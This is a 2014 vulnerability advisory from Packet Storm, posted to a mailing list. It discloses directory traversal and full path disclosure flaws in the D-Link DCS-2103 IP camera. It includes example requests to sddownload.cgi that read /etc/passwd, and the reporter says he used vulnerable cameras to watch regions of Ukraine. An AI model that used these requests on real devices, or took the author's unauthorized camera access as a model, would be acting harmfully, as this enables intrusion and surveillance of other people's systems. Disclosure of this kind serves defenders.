D-Link DCS-2103 Directory Traversal

2014-11-16T00:00:00
ID PACKETSTORM:129138
Type packetstorm
Reporter MustLive
Modified 2014-11-16T00:00:00

Description

                                        
                                            `Hello list!  
  
There are Directory Traversal and Full path disclosure vulnerabilities in   
D-Link DCS-2103 (IP camera).  
  
-------------------------  
Affected products:  
-------------------------  
  
Vulnerable is the next model: D-Link DCS-2103, Firmware 1.0.0. This model   
with other firmware versions also must be vulnerable.  
  
I found these vulnerabilities at 11.07.2014 and later informed D-Link. But   
they haven't answered. It looks like they are busy with fixing   
vulnerabilities in DAP-1360, which I wrote about earlier.  
  
----------  
Details:  
----------  
  
Directory Traversal (Arbitrary File Download) (WASC-33):  
  
http://site/cgi-bin/sddownload.cgi?file=/../../etc/passwd  
  
Full path disclosure (WASC-13):  
  
http://site/cgi-bin/sddownload.cgi?file=/  
  
----------------  
Disclosure:  
----------------  
  
I disclosed these vulnerabilities at my site   
(http://websecurity.com.ua/7250/).  
  
I found this and other web cameras during summer to watch terrorists   
activities in Donetsk and Lugansks regions of Ukraine   
(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2014-October/009056.html).   
You can watch my videos in the playlist Ukrainian Cyber Forces: video   
reconnaissance   
http://www.youtube.com/playlist?list=PLk7NS9SMadnj7fwAQJgkbKQdCGTKAFI9Q.  
  
Best wishes & regards,  
MustLive  
Administrator of Websecurity web site  
http://websecurity.com.ua   
  
`